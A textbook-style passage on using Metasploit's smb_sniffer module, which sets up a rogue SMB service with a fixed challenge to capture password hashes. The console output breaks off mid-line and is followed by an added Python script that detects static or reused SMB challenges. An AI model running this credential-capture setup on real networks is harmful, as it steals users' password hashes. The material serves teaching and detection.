Finally, run Metasploit with
root privileges (sudo msfconsole) so that you can bind to port 139.
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use smb_sniffer
msf smb_sniffer > show options
Exploit Options
===============
  Exploit:    Name       Default         Description
  --------    -------    ------------    ------------------------------------
  optional    KEY        "3DUfw?         The Challenge key
  optional    PWFILE                     The PWdump format log file (optional)
  optional    LOGFILE    smbsniff.log    The path for the optional log file
  required    LHOST      0.0.0.0         The IP address to bind the SMB service to
  optional    UID        0               The user ID to switch to after opening the port
  required    LPORT      139             The SMB server port
  Target: Targetless Exploit
msf smb_sniffer > set PWFILE /tmp/number_pw.txt
PWFILE -> /tmp/number_pw.txt
You can see that the Challenge key is hex 11 (unprintable in ASCII), hex 22 (ASCII "),
hex 33 (ASCII 3), and so on. The malicious SMB service will be bound to every IP
address on port 139. Here's what appears on screen when we kick it off and browse to
\\192.168.1.116\share\foo.gif from 192.168.1.220 using the grayhat user:
msf smb_sniffer > exploit
[*] Listener created, switching to userid 0
[*] Starting SMB Password Service
[*] New connection from 192.
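Seen from the defending side, the fixed KEY above is a detection signal: a legitimate SMB server issues a fresh 8-byte challenge for each session, while this listener hands every client the same one. The following is an added example (not from the original text and not Metasploit code) that flags servers presenting a static or reused challenge; the record format and the sample sessions are constructed, and it assumes a network sensor that already extracts the challenge from SMB negotiate responses.

```python
from collections import defaultdict

# Default KEY from the module options above: hex 11 22 33 44 55 66 77 88.
KNOWN_STATIC = {bytes.fromhex("1122334455667788")}

# Constructed sample: (server_ip, challenge_hex) per SMB session, as a
# hypothetical sensor might export them from negotiate responses.
SAMPLE_SESSIONS = [
    ("192.168.1.10", "9f3c5a01d477e2b8"),
    ("192.168.1.10", "04be91c6d2573fa0"),
    ("192.168.1.116", "1122334455667788"),
    ("192.168.1.116", "1122334455667788"),
]


def audit_challenges(sessions):
    """Return {server_ip: [reasons]} for servers with suspicious challenges."""
    seen = defaultdict(list)
    for server, chal_hex in sessions:
        try:
            seen[server].append(bytes.fromhex(chal_hex))
        except ValueError:
            seen[server].append(b"")  # unparseable value, reported below

    findings = {}
    for server, chals in seen.items():
        reasons = []
        if any(len(c) != 8 for c in chals):
            reasons.append("malformed challenge")
        if any(c in KNOWN_STATIC for c in chals):
            reasons.append("known static challenge")
        valid = [c for c in chals if len(c) == 8]
        if len(set(valid)) < len(valid):
            reasons.append("challenge reused across sessions")
        if reasons:
            findings[server] = reasons
    return findings


if __name__ == "__main__":
    for server, reasons in audit_challenges(SAMPLE_SESSIONS).items():
        print(f"{server}: {', '.join(reasons)}")
```

A listener configured with a different KEY is still caught by the reuse check once two sessions to it have been observed.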